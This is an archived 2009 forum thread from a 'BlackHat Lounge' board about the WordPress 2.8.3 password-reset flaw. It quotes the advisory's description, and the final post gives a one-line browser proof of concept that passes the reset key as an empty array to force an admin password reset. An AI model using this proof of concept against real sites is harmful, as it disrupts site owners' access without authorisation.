New wordpress securty

Discussion in 'BlackHat Lounge' started by gundamwing, Aug 11, 2009.

  1. gundamwing

    gundamwing Supreme Member

    Joined:
    Sep 18, 2008
    Messages:
    1,284
    Likes Received:
    921
    Secure your blog now


    Code:
    http://www.milw0rm.com/exploits/9410
    III. DESCRIPTION
    -------------------------
    The way Wordpress handle a password reset looks like this:
    You submit your email adress or username via this form /wp-login.php?action=lostpassword ;
    Wordpress send you a reset confirmation like that via email:

    "
    Someone has asked to reset the password for the following site and username.
    http://DOMAIN_NAME.TLD/wordpress
    Username: admin
    To reset your password visit the following address, otherwise just
    ignore this email and nothing will happen

    http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
    "

    You click on the link, and then Wordpress reset your admin password, and
    sends you over another email with your new credentials.
     
  2. royalmice

    royalmice BANNED BANNED

    Joined:
    Aug 23, 2007
    Messages:
    1,186
    Likes Received:
    983
    Sorry but i just dont get it, what is it supppose to do, the passw reset thing aint new
     
  3. cheap2art

    cheap2art BANNED BANNED

    Joined:
    Oct 21, 2008
    Messages:
    159
    Likes Received:
    13
    wp just updated but it buggy already?? great!
    btw.. how do hacker know the right "key" to reset the admin password???
     
  4. gundamwing

    gundamwing Supreme Member

    Joined:
    Sep 18, 2008
    Messages:
    1,284
    Likes Received:
    921
  5. tsanko

    tsanko Senior Member

    Joined:
    Aug 9, 2008
    Messages:
    862
    Likes Received:
    1,041

    How? :)
     
  6. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Joined:
    Apr 2, 2008
    Messages:
    976
    Likes Received:
    3,476
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    it sends the email to the person who owns the name. you can't access it...
     
  7. Keedev

    Keedev Regular Member

    Joined:
    Apr 2, 2008
    Messages:
    290
    Likes Received:
    100
    It just resets, no need to access anything.


    Clarify, 2.8.3/wordpress. Still on 7 :flame:
     
  8. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Joined:
    Apr 2, 2008
    Messages:
    976
    Likes Received:
    3,476
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    i tried it and it said, 'click the link below to reset'.

    i didn't so everything stayed the same.
     
  9. khan0

    khan0 Registered Member

    Joined:
    Jul 16, 2008
    Messages:
    74
    Likes Received:
    16
    Location:
    Toronto
    You need to pass the key as an array.

    A web browser is sufficiant to reproduce this Proof of concept:
    Code:
    http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=